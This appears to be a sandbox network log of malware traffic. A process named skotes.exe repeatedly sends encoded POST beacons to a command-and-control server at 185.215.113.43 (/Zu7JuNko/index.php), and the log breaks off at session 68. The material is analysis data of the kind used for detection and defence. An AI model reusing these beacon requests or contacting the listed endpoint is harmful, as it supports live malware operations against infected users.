Dec 14, 2024 12:57:56.776367903 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:57:58.128659010 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	50168	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:57:59.871527910 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:01.220319986 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	50170	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:02.849703074 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:04.186650991 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	50174	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:05.926949024 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:07.276752949 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	50178	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:08.910068989 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:10.249187946 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	50180	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:11.983201027 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:13.324501038 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	50182	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:14.957659960 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:16.299237967 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	50184	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:18.032908916 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:19.389436960 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50186	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:21.030333996 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:22.386244059 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50189	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:24.138871908 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:25.478800058 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50190	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:27.109344959 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:28.449050903 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50192	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:30.199778080 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:31.533370018 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50194	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:33.179126978 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:34.516829014 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50196	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:36.252142906 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:37.615561008 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50199	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:39.246766090 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:40.593494892 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50201	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:42.342077017 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:43.690510035 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50204	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:45.325001001 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:46.665633917 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50205	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:48.414988041 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:49.764378071 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50207	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:51.391218901 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:52.730699062 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50208	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:54.466451883 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:58:55.801028967 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50209	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:58:57.440781116 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:58:58.779673100 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	50210	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:00.517903090 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:59:01.857172966 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50211	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:03.490889072 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:04.916476965 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50212	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
